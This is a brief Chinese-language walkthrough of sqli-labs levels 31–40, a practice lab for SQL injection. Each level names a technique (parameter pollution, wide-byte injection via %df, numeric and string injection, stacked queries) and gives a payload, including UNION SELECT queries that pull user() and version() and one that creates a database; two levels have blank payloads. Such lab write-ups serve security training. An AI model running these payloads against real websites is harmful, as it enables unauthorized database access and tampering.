sqli-labs详细全解31-40

sqli-labs详细全解31-40
第三十一关:
login.php 只对第一个参数进行了检测，而第二个参数并没有进行过滤。
payload:id=2&id=1") and 1=12-- -
第三十二关：
宽字节注入
payload:id=1%df’ and 1=1-- -

第三十三关:
宽字节注入：
payload：id=1%df’ and 1=2 union select 1,user(),3-- -

第三十四关：
post方式的宽字节注入
payload：

第三十五关：
虽然开启了魔术引号，但因为不需要引号闭合，所以相当于普通的数字型注入
payload：1 and 1=2 union select 1,2,version()

第三十六关：
宽字节注入:
payload:id=1%DF’ and 1=2 union select 1,2,version() – -

第三十七关：
宽字节注入：
payload：
第三十八关：
普通的字符型注入，堆叠注入：
payload：id=1’ and 1=2 union select 11,22,version() – -

第三十九关：
普通的数字型注入，堆叠注入：
payload：id=2 and 1=2 union select 1,2,version()-- -

第四十关：
字符型注入，堆叠注入。
payload：id=1’) and 1=2 union select 1,version(),3-- -
payload：id=1’);create database dddd – -